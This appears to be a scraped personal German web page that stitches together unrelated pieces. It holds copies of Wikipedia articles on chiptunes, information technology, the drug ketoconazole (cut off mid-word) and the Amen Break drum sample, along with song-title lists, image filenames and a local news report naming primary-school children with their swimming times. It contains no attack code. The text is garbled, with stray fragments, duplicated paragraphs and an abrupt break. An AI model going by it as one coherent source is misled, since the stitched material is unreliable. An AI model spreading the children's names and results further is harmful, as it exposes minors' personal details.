Zur Navigation springen
Zur Suche springen
Ein 6581er und ein 8580er SID-Chip des Commodore C64

Chiptunes bilden ein Genre innerhalb der computererstellten Musik, das sich durch einen charakteristischen künstlichen Klang auszeichnet. Der Ursprung liegt in der Heimcomputer- und Telespiele-Ära.

Die ursprünglichen Chiptunes wurden durch Soundchips mit relativ primitiven Tongeneratoren erzeugt. Hierbei konnten in Echtzeit 3 bis 4 Töne parallel erzeugt werden. Gegenüber dem primitivsten elektronischen Tongenerator, der nur einen sinusförmigen Piepton erzeugt, konnten diese Soundchips bereits die Wellenform unterschiedlich beeinflussen und zudem Rauschen erzeugen. Das Ergebnis klingt so klar erkennbar künstlich, auch wenn sich eine Art von unterschiedlichen unnatürlichen Musikinstrumenten reininterpretieren lässt.

Ein verwandtes Genre ist der Bitpop.
Inhaltsverzeichnis

    1 Geschichte
    2 Komposition
    3 Literatur
    4 Weblinks

Geschichte

Der Begriff Chiptune stammt aus der Ära des Heimcomputers Amiga, der mit seinem Dateiformat Mod Musikern bereits die Möglichkeit bot, mit Samples zu arbeiten und ihnen damit größere Freiheiten hinsichtlich des Klangs verschaffte. Dies ging trotz erheblicher technischer Einschränkungen in Richtung moderner Synthesizer, die natürliche Musikinstrumente täuschend echt imitieren können. Verwendete ein Musiker weiterhin die Tongeneratoren der damaligen Soundchips konventionell, oder klang das Ergebnis zumindest so, wurde sein Werk als „Chiptune“ bezeichnet, um es von der moderneren Sampling-Musik abzugrenzen.

Chiptunes weisen normalerweise eine geringe Datenmenge auf, sehr ähnlich dem MID-Dateiformat basierend auf MIDI, und fanden deshalb oft Verwendung in Intros aus der Demoszene- sowie Cracktros von Releasegroups aus der Warez-Szene, bei denen es nötig ist, möglichst wenig Speicherplatz zu belegen.

Echte Chiptunes stehen heute noch in einer Nische außerhalb von Techno, Elektropop, Industrial u. a., erinnern aber oft an diese Genres. Auch gegenüber Klingeltönen grenzt sich die Szene ab und möchte nicht damit in Verbindung gebracht werden. Der Anspruch, die Musik mit modernen Trackern aus Sprachsamples und Effekten zu gestalten, geht weit darüber hinaus. Einige „Chiptuner“ sehen im Techno bzw. in der Techno-Welle der 1990er nur einen Ableger ihrer Arbeit, eine Inflationierung ihres früheren Werks und die Degenerierung der ursprünglichen Chiptunes für den Massengeschmack, obgleich sich einige auch erfolgreich dort wiedergefunden haben.
Komposition

Charakteristisch für Chiptunes ist das seltene Vorkommen von tatsächlich mehrstimmigen Akkorden im klassischen Sinn. Bei Chiptunes werden Akkorde normalerweise über Arpeggios gebildet, um Tonspuren einzusparen. Diese Einschränkung basiert darauf, dass die ersten Soundchips selten mehr als drei Tonkanäle parallel abspielen konnten – das Spielen eines Akkords hätte häufig alle verfügbaren Kanäle belegt.

Aufgrund dieser „Stimmenknappheit“ besitzen viele Chiptunes einen sehr komplexen Aufbau. Um mehr als nur drei Instrumente erklingen zu lassen, werden die Lücken in einer Melodie, beispielsweise der des Basses, genutzt, um dort ein anderes Instrument oder eine Begleitstimme erklingen zu lassen. Somit befinden sich auf einem Kanal zwei oder mehr Melodien oder Stimmen. Diese Technik bietet sich dafür an, Rhythmen mit vielen vorgezogenen Elementen zu verwenden. Im Bereich der SID-Tunes hat sich so ein sehr funkiger Stil entwickelt.

Eine weitere Technik, um mehr Stimmen einzubauen, findet sich oft auf dem Kanal, wo Bass und die Schlaginstrumente zu hören sind. Vor die einzelnen Basstöne wird für den Bruchteil einer Sekunde ein Rauschen gesetzt. Dies erzeugt den Eindruck einer Art Hi-Hat eines Schlagzeugs. Durch die Aufhebung der Kanalbegrenzung moderner Tracker gibt es für Komponisten heute jedoch weitgehend keine technische Einschränkungen mehr.
Literatur

    Nils Dittbrenner: Soundchip-Musik. Osnabrück: epOs-Music 2007, ISBN 978-3-923486-94-6
    Julia Mihály: low tech music for high tech people. In: MusikTexte 155, 2017, ISSN 0178-8884

Weblinks
 Commons: Chiptune – Sammlung von Bildern, Videos und Audiodateien

    Audio-Datei / Hörbeispiel Hörbeispiel: Ein für den Nintendo-Entertainment-System-Soundchip generierter klassischer Chiptune?/i
    Interview von Radio Unerhört Marburg mit dem Micromusic-Headquarter Berlin über micromusic.net und Chipmusik im Allgemeinen
    Chiptune Online Player: Amiga, C64, AtariST, Mod

Gesprochene Wikipedia 	Dieser Artikel ist als Audiodatei verfügbar:
	
0:00
Speichern | Informationen | 07:06 min (3,3 MB) Text der gesprochenen Version (22. November 2014)
	Mehr Informationen zur gesprochenen Wikipedia
Kategorien:

    Wikipedia:Gesprochener ArtikelStil der elektronischen MusikComputerspielmusik

Der Schrott Mama-Strahlung


Chris Hülsbeck
normal_68642630_2637254556294291_6903396003961896960_n.jpg

Informationstechnik
Zur Navigation springen
Zur Suche springen

Informationstechnik (kurz IT, häufig englische Aussprache [aɪ tiː]) ist ein Oberbegriff für die Informations- und Datenverarbeitung auf Basis dafür bereitgestellter technischer Services und Funktionen. Diese werden auf einer dahinterliegenden technischen IT-Infrastruktur bereitgestellt. Es spielt dabei keine Rolle, ob die Services- und Funktionen als auch die technische IT-Infrastruktur physisch vor Ort oder virtuell oder über Netzwerke bereitgestellt werden. (Informationstechnisches System).

Eigentlich versteht man unter dem Begriff speziell elektronische Informationstechnik (EIT), zur Informationstechnik gehören auch nicht-elektronische Systeme (wie die anfangs rein elektrische Telefonie und Telegraphie). Der eigentliche Fachbegriff ist aber (elektronische) Informations- und Datenverarbeitung (EID), der die anfangs getrennten Technologien der Kommunikationsmedien (‚Information‘ im ursprünglichen Sinne der Mitteilung) und der Datenverarbeitung im engeren Sinne (von Akten, Zahlenreihen und ähnlichem, EDV) zusammenfasst. Da die beiden Begriffe Information und Daten heute in der Praxis inhaltlich weitgehend verschmolzen sind, wie auch Technik und Verarbeitung nicht zu trennen sind, wird der Ausdruck „IT“ für den gesamten technologischen Sektor verwendet.

Die Ausdrücke Informationstechnik und Informationstechnologie können – im nichtwissenschaftlichen Bereich – als synonym angesehen werden: Unter „Technik“ versteht man üblicherweise allenfalls speziell die konkrete praktische Umsetzung (Anwendung), unter „Technologie“ die Forschung und Entwicklung und die theoretischen Grundlagen. In dem hochinnovativen Sektor wie auch bei Software ist das kaum trennbar.

Als zeitgemäße Veranschaulichung zur Einordnung der IT in übergeordnete Systeme eignet sich eine Betrachtung im 3-Ebenen-Modell. Sie zeigt verbundene technische Systeme und deren Nutzen für einzelne User oder für Prozesse in Organisationen:[1]
IT-3-Ebenen-Modell: Prozesse der Informationsverarbeitung und der Informationstechnik auf drei Ebenen dargestellt: 1. User und Prozesse 2. IT-Funktionen (Services) 3. IT-Infrastruktur
Übersicht der Prozesse der Informationsverarbeitung und der Informationstechnik in einem schematisch vereinfachten 3-Ebenen-Modell der IT

    IT-User und IT-basierte Organisationsprozesse
    IT-Funktionen: Services und Applikationen / Portale und Betriebssysteme
    IT-Infrastruktur(en) als technische Basis

Eine andere Sicht auf die IT, die Sicht der durch die IT angebotenen Dienste, bietet das Konzept SOA (Serviceorientierte Architektur).
Inhaltsverzeichnis

    1 Bedeutung
    2 Wachstum der weltweiten Kapazität der Informationstechnik
    3 Gebiete
    4 Lehrberuf in Österreich
    5 Literatur
    6 Weblinks
    7 Einzelnachweise

Bedeutung

Die Informationstechnik stellt ein Bindeglied zwischen der klassischen Elektrotechnik und der Informatik dar. Das wird z. B. dadurch ersichtlich, dass sich viele elektrotechnische Fakultäten von Hochschulen und Abteilungen höherer Schulen (z. B. Höhere Technische Lehranstalten, HTLs) in „Informationstechnik“ oder zumindest in „Elektrotechnik und Informationstechnik“ bzw. „Informationstechnologie“ umbenennen.

Der Informationstechnik nahe ist die Technische Informatik, die sich unter anderem mit Schaltnetzen und -werken sowie dem Aufbau und der Organisation von Computern beschäftigt. Aber auch die (Hardware-)Aspekte der Ausgabe- und Eingabegeräte, also klassische und zukünftige Mensch-Maschine-Schnittstellen (Human-Computer Interfaces), gehören in diesen Bereich.

Digitale Signalverarbeitung und Kommunikationstechnik sind wiederum Grundlage für Rechnernetze. Das Zusammenwachsen von Informationstechnik, Telekommunikation und Unterhaltungselektronik wird daher auch oft als Informations- und Kommunikationstechnik (IuK) oder Informations- und Telekommunikationstechnik (ITK) bezeichnet.

Entwicklungen der IT haben in den letzten Jahrzehnten viele Lebensbereiche verändert, so neben der Wirtschaft auch die Wissenschaft. Hierbei ist auch die Erforschung und Entwicklung der Mensch-Computer-Interaktion zunehmend relevant geworden.
Wachstum der weltweiten Kapazität der Informationstechnik

Das Wachstum der globalen Kapazität der Digitaltechnik wurde in drei unterscheidbaren Gruppen quantifiziert:

    Die wachsende Kapazität, Information durch den Raum zu übertragen (Kommunikation);
    die Kapazität, Information durch die Zeit zu übermitteln (Speicherung); und
    die Kapazität, mit Information zu rechnen (Informatik):[2]

    Die effektive Kapazität der Weltinformationen durch das (bidirektionale) Telekommunikationsnetz betrug 280 (optimal komprimierte) Petabyte 1986, und 20 % davon wurden in digitalen Netzwerken übertragen. Im Jahr 2007 wuchs diese weltweite Kapazität auf 65 (optimal komprimierte) Exabyte, wobei 99,9 % der übermittelten Information in digitalen Bits übertragen wurden. Dies ist eine jährliche Wachstumsrate von 30 % und fünfmal so schnell wie das weltweite Wirtschaftswachstum.[3]
    Die globale technologische Kapazität, Informationen zu speichern, ist von 2,6 (optimal komprimierten) Exabyte im Jahr 1986 auf 300 (optimal komprimierten) Exabyte im Jahr 2007 gewachsen, wobei 1986 weniger als 1 % der globalen Speicherkapazität digital war, und 2007 fast 95 %.[3] Dies ist das informationale Äquivalent von 404 Milliarden CD-ROMs für 2007. Es wird angenommen, dass es der Menschheit 2002 erstmals möglich war, mehr Information digital als im Analogformat zu speichern; quasi der Beginn des „digitalen Zeitalters“.[2]
    Die technologische Kapazität der Welt, Informationen mit digitalen Mehrzweck-Computern zu berechnen, ist von 3,0 × 108 MIPS im Jahr 1986 bis zu 6,4 × 1012 MIPS im Jahr 2007 gewachsen,[3] was einer jährlichen Wachstumsrate von 60 % entspricht, also zehnmal schneller als das globale Wirtschaftswachstum.

Gebiete

Vier Teilgebiete werden heute teils unterschieden:

    Business-IT beinhaltet die IT von Handel, Börse, Versicherungen, Banken und Steuerwesen.
    Industrielle IT befasst sich mit der Vernetzung der Maschinen in Herstellungs- und Produktionsprozessen innerhalb eines Werkes, zunehmend aber auch über die Werk- und Firmengrenzen hinweg (Supply Chain). Neuerdings wird die Industrielle IT direkt an die Geschäftsprozesse angebunden. So entstehen etwa Schnittstellen zwischen den Bussystemen, die die Maschinen steuern, und den Ressourcen-Planungs-Systemen (ERP-Software).

    „Eine gebräuchliche Bezeichnung im Einsatzgebiet industrieller IT ist der Fachbegriff Operational Technology (OT),[4] der versucht, alle interagierende Komponenten in komplexen und abhängigen Systemen zu beschreiben. Diese Komponenten werden meist über SCADA-Systeme hochintegriert gesteuert und überwacht.“

    Kommunikations-IT befasst sich mit dem Einsatz der Telekommunikation.
    Unterhaltungs-IT befasst sich mit Spielgeräten und Multimedia-Anwendungen.

Lehrberuf in Österreich

In Österreich ist Informationstechnologie auch ein anerkannter Lehrberuf. Die Ausbildung spaltet sich dabei schon zu Beginn an in die zwei getrennten Bereiche Informatik und Technik, die Lehrzeit bleibt mit 3,5 Jahren jedoch gleich. Während das Hauptaugenmerk der Informatik-Ausbildung mehr um die Programmierung und Anpassung von Software kreist, ist die Technik-Ausbildung mehrheitlich Hardware-spezifisch.
Literatur

    Siegfried Wendt: Nichtphysikalische Grundlagen der Informationstechnik. Interpretierte Formalismen. Springer, Berlin 1989, ISBN 978-3-540-51555-5.
    Horst Jansen, Heinrich Rötter: Informationstechnik und Telekommunikationstechnik (Lernmaterialien). Europa-Lehrmittel, Haan 2003, ISBN 3-8085-3623-3.
    Andreas Holzinger: Basiswissen IT/Informatik. Band 1: Informationstechnik (Das Basiswissen für die Informationsgesellschaft des 21. Jahrhunderts). Vogel, Würzburg 2002, ISBN 3-8023-1897-8.
    Klaus Gotthardt: Grundlagen der Informationstechnik. Lit-Verlag, Münster 2001, ISBN 3-8258-5556-2.
    Walter Hehl: Trends in der Informationstechnologie. Von der Nanotechnologie zu virtuellen Welten. vdf Hochschulverlag AG an der ETH Zürich, Zürich 2008, ISBN 978-3-7281-3174-4.
    Horst Völz: Das ist Information. Shaker Verlag, Aachen 2017, ISBN 978-3-8440-5587-0.
    Horst Völz: Wie wir wissend wurden. Nicht Alles ist Information. Shaker Verlag, Aachen 2018, ISBN 978-3-8440-5865-9.

Wörterbücher

    Dietmar Schanner: Wörterbuch Informationstechnik und Medien. Cornelsen, Berlin 2001, ISBN 3-464-49417-9.

Weblinks
WiktionaryWiktionary: Informationstechnik – Bedeutungserklärungen, Wortherkunft, Synonyme, Übersetzungen
WikibooksWikibooks: EDV – Lern- und Lehrmaterialien

    Literatur über Informationstechnik im Katalog der Deutschen Nationalbibliothek
    Sascha Kersken: Kompendium der Informationstechnik – Openbook: EDV-Grundlagen, Programmierung, Mediengestaltung
    Phenomenological Approaches to Ethics and Information Technology. In: Edward N. Zalta (Hrsg.): Stanford Encyclopedia of Philosophy.
    Berufs- und Brancheninfos, Zweig Informatik der Wirtschaftskammer Österreich
    Berufs- und Brancheninfos, Zweig Technik der Wirtschaftskammer Österreich
    Zweig Informatik. Berufsbeschreibung BIC
    Zweig Technik. Berufsbeschreibung BIC

Einzelnachweise
Institut für Interne Revision Österreich – IIA Austria (Hrsg.): Informationssicherheitsmanagementsystem. Damoklesschwert Daten-GAU – Systematische Prüfung und wirksame Prävention. Linde Verlag, Wien 2016, ISBN 978-3-7094-0850-6, Rahmenkonzepte und Prüfansätze, S. 141, S. 29.
Video Animation über The World’s Technological Capacity to Store, Communicate, and Compute Information from 1986 to 2010 (Memento des Originals vom 18. Januar 2012 im Internet Archive) i Info: Der Archivlink wurde automatisch eingesetzt und noch nicht geprüft. Bitte prüfe Original- und Archivlink gemäß Anleitung und entferne dann diesen Hinweis.
Martin Hilbert, Priscila López: The World’s Technological Capacity to Store, Communicate, and Compute Information. In: Science, 332(6025), 2011, S. 60–65; kostenfreien Zugriff auf den Artikel gibt es durch diese Seite: martinhilbert.net/WorldInfoCapacity.html

    Operational Technology gartner.com

Normdaten (Sachbegriff): GND: 4026926-7
Kategorien:

    InformationstechnikTechnisches Fachgebiet

Navigationsmenü

    Nicht angemeldet
    Diskussionsseite
    Beiträge
    Benutzerkonto erstellen
    Anmelden

    Artikel
    Diskussion

    Lesen
    Bearbeiten
    Quelltext bearbeiten
    Versionsgeschichte

Suche

    Hauptseite
    Themenportale
    Zufälliger Artikel

Mitmachen

    Artikel verbessern
    Neuen Artikel anlegen
    Autorenportal
    Hilfe
    Letzte Änderungen
    Kontakt
    Spenden

Werkzeuge

    Links auf diese Seite
    Änderungen an verlinkten Seiten
    Spezialseiten
    Permanenter Link
    Seiten­informationen
    Wikidata-Datenobjekt
    Artikel zitieren

In anderen Projekten

    Commons
    Wikibooks

Drucken/­exportieren

    Buch erstellen
    Als PDF herunterladen
    Druckversion

In anderen Sprachen

    Alemannisch
    Dansk
    English
    Español
    Français
    Italiano
    Nederlands
    Русский
    Türkçe

Links bearbeiten

    Diese Seite wurde zuletzt am 7. Juni 2019 um 18:31 Uhr bearbeitet.
    Abrufstatistik · Autoren

    Der Text ist unter der Lizenz „Creative Commons Attribution/Share Alike“ verfügbar; Informationen zu den Urhebern und zum Lizenzstatus eingebundener Mediendateien (etwa Bilder oder Videos) können im Regelfall durch Anklicken dieser abgerufen werden. Möglicherweise unterliegen die Inhalte jeweils zusätzlichen Bedingungen. Durch die Nutzung dieser Website erklären Sie sich mit den Nutzungsbedingungen und der Datenschutzrichtlinie einverstanden.
    Wikipedia® ist eine eingetragene Marke der Wikimedia Foundation Inc.

Terzolin

350px-Ketoconazol-Enantiomere_Strukturformeln.png

Ketoconazol Zur Navigation springen Zur Suche springen Strukturformel Ketoconazol-Enantiomere Strukturformeln.png Ketoconazol, ein 1:1-Gemisch der Stereoisomere (2S,4R)-Ketoconazol (oben) und (2R,4S)-Ketoconazol (unten) Allgemeines Freiname Ketoconazol Andere Namen

   (2RS,4SR)-1-(4-{4-[-2-(2,4-Dichlorphenyl)-2-(imidazol-1-ylmethyl)-1,3-dioxolan-4-ylmethoxy]phenyl}piperazin-1-yl)ethanon (IUPAC)
   (±)-cis-1-Acetyl-4-{4-[cis-2-(2,4-Dichlorphenyl)-2-(1-imidazolylmethyl)-1,3-dioxolan-4-ylmethoxy]phenyl}piperazin
   Ketoconazolum (Latein)

Summenformel C26H28Cl2N4O4 Kurzbeschreibung

weißes bis fast weißes Pulver[1] Externe Identifikatoren/Datenbanken CAS-Nummer 65277-42-1 Arzneistoffangaben ATC-Code

   J02AB02
   D01AC08
   G01AF11

Wirkstoffklasse

Antimykotikum Wirkmechanismus

Hemmung der Biosynthese des Ergosterols der Pilze Eigenschaften Molare Masse 531,43 g·mol−1 Aggregatzustand

fest Schmelzpunkt

146 °C[2] Löslichkeit

praktisch unlöslich in Wasser, leicht löslich in Dichlormethan, löslich in Methanol, wenig löslich in Ethanol[1] Sicherheitshinweise Bitte die Befreiung von der Kennzeichnungspflicht für Arzneimittel, Medizinprodukte, Kosmetika, Lebensmittel und Futtermittel beachten GHS-Gefahrstoffkennzeichnung aus Verordnung (EG) Nr. 1272/2008 (CLP),[4] ggf. erweitert[3] 06 – Giftig oder sehr giftig 08 – Gesundheitsgefährdend 09 – Umweltgefährlich

Gefahr H- und P-Sätze H: 301​‐​360F​‐​373​‐​410 P: 201​‐​273​‐​301+310​‐​308+313​‐​501 [3] Toxikologische Daten

   166 mg·kg−1 (LD50, Ratte, oral)[5]
   86 mg·kg−1 (LD50, Ratte, i.v.)[5]
   618 mg·kg−1 (LD50, Maus, oral)[5]
   32 mg·kg−1 (LD50, Maus, i.v.)[5]

Soweit möglich und gebräuchlich, werden SI-Einheiten verwendet. Wenn nicht anders vermerkt, gelten die angegebenen Daten bei Standardbedingungen.

Ketoconazol ist ein Arzneistoff aus der Gruppe der Imidazole, der zur Vorbeugung und Behandlung von Pilzerkrankungen der Haut verwendet wird. Inhaltsverzeichnis

   1 Geschichte
   2 Anwendung
   3 Wirkungsweise
   4 Behandelbare Erreger
   5 Nebenwirkungen
   6 Chemische Eigenschaften
   7 Stereoisomerie
   8 Handelsnamen
   9 Einzelnachweise

Geschichte

Ketoconazol wurde 1978 von Janssen-Cilag patentiert[5] und Anfang der 80er Jahre in den Handel gebracht. Es war das erste oral anwendbare Antimykotikum. Anwendung

Das Medikament wird besonders bei Personen mit einer Erkrankung des Immunsystems wie AIDS oder Infektionen aufgrund von Autoimmunerkrankungen eingesetzt. Beispiele für mit dem Medikament behandelbare Erkrankungen sind das Seborrhoische Ekzem oder die Pityriasis versicolor (Kleienpilzflechte).

Ketoconazol wird beispielsweise in Anti-Schuppen-Shampoos verwendet. Es gibt verschieden starke Dosierungen des Mittels. Das Shampoo kann wie ein normales Shampoo benutzt werden, wenn es nach der Anwendung gründlich ausgespült wird. Im Rahmen einer Schwangerschaft sollte sicherheitshalber auf die Anwendung verzichtet werden, da im Tierversuch eine Fruchtschädigung bei hohen Dosierungen auftrat.

Ketoconazol ist apothekenpflichtig; Arzneiformen zur systemischen Anwendung (Tabletten) sind zudem in den meisten Ländern rezeptpflichtig.[6]

Ebenso wird Ketoconazol angewendet bei dem sogenannten Morbus Cushing. Es hemmt die Produktion von Cortisol und kommt zum Einsatz, wenn operative Maßnahmen nicht möglich sind. Wirkungsweise

Ketoconazol verhindert die Produktion von Ergosterol, das den Hauptbestandteil der Zellmembran der Erreger darstellt. Die Wirkungsweise beruht auf der Hemmung von Cytochrom P450 abhängigen Enzymen,[7] woraus sich sowohl die Hepatotoxizität als auch die Nutzung bei Morbus Cushing erklären lässt. Die Synthese von NNR-Hormonen (z. B. Cortisol) benötigt an mehreren Stellen von Cytochrom P450 abhängige Enzyme. Behandelbare Erreger

Ketoconazol verhindert das Wachstum von Dermatophyten und von Hefepilzen wie Candida albicans. Resistenzen gegen Ketoconazol sind bei einigen Candida albicans-Stämmen bekannt. Nebenwirkungen

Die Europäische Arzneimittel-Agentur will die oralen Ketoconazole aufgrund der starken Leberschädigung verbieten.[8][9] Die FDA gibt im Gegensatz dazu nur Warnhinweise zur Verwendung oraler Ketoconazole heraus.[10]

Ketoconazol in oraler Form ist aufgrund seiner Eigenschaft als Hemmer der Cytochrom-P450-Enzyme in der Nebenniere ein starker Hemmer der Cortisolsynthese. Ferner hat Ketoconazol direkte Auswirkungen auf kortikotrope Tumorzellen bei Patienten mit Cushing-Syndrom. Ketoconazol in oraler Form ist kontraindiziert bei Patienten mit akuten oder chronischen Lebererkrankungen oder wenn die Leberenzymwerte bei Behandlungsbeginn um mehr als das Zweifache über der Obergrenze des Normwerts liegen. Eine Behandlung damit darf nicht fortgeführt werden, wenn Symptome einer Hepatitis vorliegen oder die Leberenzymwerte auf das Dreifache der Obergrenze der Normwerte ansteigen.[11]

Der Mechanismus der Schädigung der Leber infolge der Einnahme von Ketoconazol ist nicht vollständig geklärt. Aufgrund des Risikos von Hepatotoxizität wurde im Oktober 2013 die Marktzulassung für orales Ketoconazol als Antimykotikum suspendiert.[11]

Aufgrund seiner Nebenwirkungen wird Ketoconazol vermehrt durch neuere Fungizide ersetzt, wie beispielsweise Fluconazol und/oder Itraconazol. Chemische Eigenschaften

Ketoconazol ist ein weißes bis gelbliches Pulver mit einer Schmelztemperatur von 146 °C. Es ist stark lipophil und sehr wenig löslich in Wasser. Es ist ein Imidazolderivat und gehört allgemein zur Gruppe der Azol-Fungizide. Stereoisomerie

Aus der Strukturformel von Ketoconazol ist erkennbar, dass das Molekül am 1,3-Dioxolan-Ring zwei Stereozentren in der 2- und in der 4-Position enthält. Theoretisch gibt es also folgende vier Stereoisomere: Die (2S,4R)-Form und die dazu spiegelbildliche (2R,4S)-Form sowie die (2S,4S)-Form und die dazu spiegelbildliche (2R,4R)-Form. Als Arzneistoff wird ein Racemat (1:1-Gemisch) der zueinander enantiomeren (2S,4R)-Form und der (2R,4S)-Form eingesetzt, das auch als racemische cis-Form oder (±)-cis-Form bezeichnet wird.

Die (2R,4R)-Form sowie die (2S,4S)-Form haben keine praktische Bedeutung. Handelsnamen

Monopräparate

   Nizoral (CH, D), Terzolin (D), Ket (D), Fungoral (A), Lur (CH), Ninazol (Th)

Einzelnachweise Europäische Arzneibuch-Kommission (Hrsg.): EUROPÄISCHE PHARMAKOPÖE 5. AUSGABE. Ban

Deichkind Porzelan und Elefanten Coldplay Paradise

Laiska Kleber Benutzerdaten uebermittelt

So, Laiska kann jetzt auch was schreiben. Einen Artikel :-)
normal_laiska.png

normal_me.jpg 

YTCracler - The Rooster

YTCracker feat zealous - My Monopoly

https://dragonfly.it-flash.de/music/ (YTCracker)
YTCracker feat.Tanner4105 and RMK - Use my brain

Sesame Street Theme song

Corona - Baby Baby

Corona - Rhytm of the night

normal_img_20160701_121718.jpg

This is a FlAsH Media Produktion


DJSpaceCourt - Airplanes - Radio Edit

Amen Break

Zur Navigation springenZur Suche springen

Wellenform des Amen Break Der Amen Break ist ein Sample aus dem Stück Amen, Brother der Soulband The Winstons von 1969. Es handelt sich um ein kurzes Solo des Schlagzeugers Gregory C. Coleman in der Mitte des Songs. Der Break ist vier Takte lang, dauert sechs Sekunden und ist für einen Funkbreak mit etwa 130 bpm relativ schnell.

Der Amen Break ist eines der am häufigsten genutzten Samples in der Geschichte des Hip-Hop und der elektronischen Musik. Den Bandmitgliedern war die Verwendung und der Erfolg des Samples nicht bekannt. Sänger Richard Lewis Spencer erfuhr erst Mitte der Neunziger davon, als sich jemand telefonisch um die Rechte an dem Song bemühte.[1]

Durch eine im Februar 2015 gestartete Crowdfunding-Aktion war es im November desselben Jahres möglich, Spencer eine Summe von 24.000 US-Dollar zu überreichen. Der Urheber des Amen Break, Schlagzeuger Gregory Coleman, war 2006 in Obdachlosigkeit verstorben.[2][3]

Der kraftvolle und dabei relativ dumpfe Klang der Schlagzeugaufnahme und der einprägsame, synkopierte Rhythmus machen das Sample besonders brauchbar, um in höherem Tempo abgespielt zu werden, beispielsweise indem eine 33⅓-UpM-Schallplatte mit 45 Umdrehungen pro Minute abgespielt wird. Das effektive Tempo liegt dann bei etwa 175 bpm. Breakbeats und der Amen Break im Speziellen sind die Grundlage der Jungle-Musik, aus der später Drum and Bass entstand. Vor allem anfangs enthielt nahezu jedes Jungle-Stück den Amen Break in mehr oder weniger erkennbarer Form, aber auch noch heute wird er immer wieder eingesetzt. Das Tempo von 175 bpm des schneller abgespielten Breaks ist auch immer noch das gängige Tempo im Drum and Bass.

\new DrumStaff <<

 \drummode {
   \override Score.BarNumber #'transparent = ##t 
   << {
     \repeat unfold 28 cymr8 cymr8 cymc8 cymr8 cymr8
   } \\ {
     \autoBeamOff
     bd8[ bd8] sn8.[ sn16] r16 sn16  bd16[ bd16] sn8.[ sn16] 
     bd8[ bd8] sn8.[ sn16] r16 sn16  bd16[ bd16] sn8.[ sn16] 
     bd8[ bd8] sn8.[ sn16] r16 sn16  bd8 r8 sn8 
     r16  sn16 bd16[ bd16] sn8.[ sn16] r16 sn16  bd8 r8 sn8 
     
   } >>
 }

>> Notation des Amen Breaks mit Hi-Hat/Crash, Snaredrum, Bassdrum (v. o. n. u.)[4]

Heutzutage wird der Amen Break nicht mehr einfach nur schneller abgespielt, sondern in einzelne kurze Samples zerteilt, die dann neu angeordnet werden können. Besonders die durchgängig klingenden Becken erzeugen hierbei einen reizvollen Effekt. Dabei werden die Samples (auch unabhängig voneinander) mit unterschiedlichen Verfremdungseffekten bearbeitet und mit verschiedenen Tonhöhen (pitches) wiedergegeben. Zum Teil werden die Samples auch mit anderen Schlagzeug-Samples kombiniert. Trotzdem hat der Amen Break wegen seines charakteristischen Klangs einen hohen Wiedererkennungswert. Die beschriebene Technik wird im Drum and Bass und anderen Stilen der elektronischen Musik auch für andere Schlagzeug-Breaks verwendet. Es kann davon ausgegangen werden, dass insbesondere im Jungle und Drum and Bass – aber auch in anderen Stilen wie Breakcore – der Amen Break zigtausendfach verwendet wurde.

Weblinks Remix-Museum whosampled.com Nate Harrison: Can I Get An Amen? – Audio-Installation über den Amen Break (englisch) Michail Hengstenberg: Kultsample "Amen Break". Vier Takte für die Ewigkeit – einestages.spiegel.de Einzelnachweise

Michail Hengstenberg: Kultsample "Amen Break". Vier Takte für die Ewigkeit. In: einestages.spiegel.de. 16. Februar 2011, abgerufen am 20. Oktober 2015.
"Amen Break": Crowdfunding für berühmtesten Drum-Beat aller Zeiten
Die Musiker hinter dem "Amen Break" haben endlich Geld dafür bekommen (Memento des Originals vom 22. November 2015 im Internet Archive) i Info: Der Archivlink wurde automatisch eingesetzt und noch nicht geprüft. Bitte prüfe Original- und Archivlink gemäß Anleitung und entferne dann diesen Hinweis., Noisey/VICE.
vgl. Mark Jonathan Butler: Unlocking the Groove: Rhythm, Meter, and Musical Design in Electronic. Indiana University Press, Bloomington 2006, ISBN 0-253-34662-2, S. 78–80. sowie File:Amen break notation.png für den Satz

Kategorie: Breakbeat

Schwimmen mit Brett und Muetze

ARACHNO mixed by DJSpaceCourt - Summer Memories 3

Schwimmen mit Brett und Mütze vonRedaktion

Mücke-Ober-Ohmen (pm). Die 3. Klassen der Grundschule Oberes Ohmtal veranstalteten kürzlich ihr Schwimmfest im Hallenbad "Aquariohm". Die Schüler absolvierten mehrere Stationen im Schwimmspaß, eine Klassenstaffel und 25-m-Brustschwimmen. Organisiert wurde die Veranstaltung von Nina Weck, unterstützt wurde sie von den Schwimmlehrern Liane Heitmann und Holger Frommann, von den Klassenlehrerinnen Silke Lang-Michaelis und Anna Epp, sowie von den Eltern Patrick ten Elsen, Laiska Kleber und Saskia Pfeffer.

Mücke-Ober-Ohmen (pm). Die 3. Klassen der Grundschule Oberes Ohmtal veranstalteten kürzlich ihr Schwimmfest im Hallenbad "Aquariohm". Die Schüler absolvierten mehrere Stationen im Schwimmspaß, eine Klassenstaffel und 25-m-Brustschwimmen. Organisiert wurde die Veranstaltung von Nina Weck, unterstützt wurde sie von den Schwimmlehrern Liane Heitmann und Holger Frommann, von den Klassenlehrerinnen Silke Lang-Michaelis und Anna Epp, sowie von den Eltern Patrick ten Elsen, Laiska Kleber und Saskia Pfeffer.


Beim Brustschwimmen der Jungen kamen auf die Plätze 1 bis 5: Konstantin Reus (Klasse 3a; 27,31 s), Jan David Hoesche (3c; 30,86 s), Theo Liehr (3c; 31,13 s), David Chodura (3b; 32,45 s) und Yannik Decher (3a; 32,73 s). Die fünf besten Mädchen waren Amelie Klös (3a; 28,31 s), Sofia Kin (3b; 31 s), Emily Hofmann (3a; 31,25 s), Amelie Rühl (3c; 31,97 s) und Hailey Schmidt (3b; 34,18 s).

Beim Schwimmspaß konnten die Kinder beim Springen, Gleiten, Streckentauchen und beim Tieftauchen Punkte sammeln, wobei unterschiedlich schwere Gegenstände an die Wasseroberfläche zu holen waren. Im Flachen galt es durch einen Tunnel zu tauchen oder in einem Tauchgang mehrere Ringe hintereinander einzusammeln.

Zielwerfen mit Bällen stand ebenso auf dem Programm wie für die weniger geübten Schwimmanfänger das Hinhocken, Hinknien oder Hinsetzen im Flachen oder unter Wasser Buchstaben zu erkennen. Die meisten Punkte sammelten bei den geübten Schwimmern Julian Sgolik, Moritz Adamek und Amelie Klös (jeweils 24 Punkte), gefolgt von Janne Hof mit 23 Punkten und Elias Pfeffer, Jan Zaprzalski und Nora Schlosser mit jeweils 22 Punkten. Die meisten Punkte in der Gruppe "Wasserflöhe" erzielten Lili Stein (20 Punkte), Alisa Bork, Sebastian Förster (jeweils 18 Punkte) und Hanna ten Elsen (17 Punkte).

